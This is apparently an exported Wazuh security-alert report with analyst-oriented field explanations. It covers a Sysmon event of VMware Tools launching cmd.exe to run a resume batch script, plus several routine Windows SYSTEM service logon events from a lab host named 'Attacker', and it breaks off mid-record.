Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows command prompt started by an abnormal process

🧠 What happened? Windows command prompt started by an abnormal process

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:32:00.460+0000 | 🧠 MITRE: ['Execution'] – ['Windows Command Shell'] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:00.460+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows command prompt started by an abnormal process
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92052
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533920.285870
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-17T16:36:53.8873601Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  212029
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-17 16:36:53.853 ProcessGuid: {94294ddc-2e25-6801-d807-000000000e00} ProcessId: 4044 Image: C:\Windows\System32\cmd.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: C:\WINDOWS\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"" CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 ParentProcessGuid: {94294ddc-ea88-67fe-4800-000000000e00} ParentProcessId: 3220 ParentImage: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe ParentCommandLine: "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-17 16:36:53.853
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-2e25-6801-d807-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4044
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\cmd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3624 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows Command Processor
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  Cmd.Exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  C:\\WINDOWS\\system32\\cmd.exe /c \"\"C:\\Program Files\\VMware\\VMware Tools\\resume-vm-default.bat\"\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\WINDOWS\\system32\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4800-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3220
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:01.954+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:01.954+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533921.291489
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:45:35.6047549Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43630
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  8104
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:02.120+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:02.120+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533922.298825
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:45:41.3826372Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43632
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:32:02.389+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:32:02.389+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533922.306163
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:45:45.2693434Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43634
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4884
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
